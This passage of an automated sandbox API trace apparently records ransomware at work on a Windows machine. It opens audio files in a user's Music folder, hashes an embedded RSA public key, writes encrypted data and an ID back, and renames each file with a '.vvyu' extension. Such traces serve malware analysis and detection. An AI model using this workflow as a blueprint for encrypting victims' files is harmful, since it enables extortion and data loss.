0x2d27ce8 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.029] GetCurrentThreadId () returned 0x264 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c120 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.030] GetCurrentThreadId () returned 0x264 [0198.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0198.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0198.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0198.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4e0 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a540 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a558 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4f8 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0198.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4c8 [0198.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0198.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0198.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0198.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0198.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0198.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d550 | out: hHeap=0x6a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.043] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x6f4e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x6f4e, lpOverlapped=0x0) returned 1 [0198.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0198.043] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x6f53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.044] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.045] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.067] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.067] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.067] CloseHandle (hObject=0x52c) returned 1 [0198.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d31688 [0198.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0198.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0198.069] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ia4pAHu.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\ia4pahu.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ia4pAHu.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\ia4pahu.wav.vvyu")) returned 1 [0198.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.072] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.074] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcfe36c0, ftCreationTime.dwHighDateTime=0x1d8a53f, ftLastAccessTime.dwLowDateTime=0x605a15e0, ftLastAccessTime.dwHighDateTime=0x1d8a6ce, ftLastWriteTime.dwLowDateTime=0x605a15e0, ftLastWriteTime.dwHighDateTime=0x1d8a6ce, nFileSizeHigh=0x0, nFileSizeLow=0x86a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L69lCXnVIkB5VvHCZYX.m4a", cAlternateFileName="L69LCX~1.M4A")) returned 1 [0198.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0198.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11e) returned 0x2c70bc8 [0198.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0198.075] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\L69lCXnVIkB5VvHCZYX.m4a") returned=".m4a" [0198.075] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\L69lCXnVIkB5VvHCZYX.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\l69lcxnvikb5vvhczyx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.087] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=34465) returned 1 [0198.087] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.090] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x867b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.090] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.092] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.092] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x86a1, lpOverlapped=0x0) returned 1 [0198.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.093] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0198.094] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.094] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.094] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.094] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.094] GetLastError () returned 0x0 [0198.094] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.095] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0198.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.095] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.095] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.095] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86a0) returned 0x2d4f778 [0198.095] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.096] HeapFree 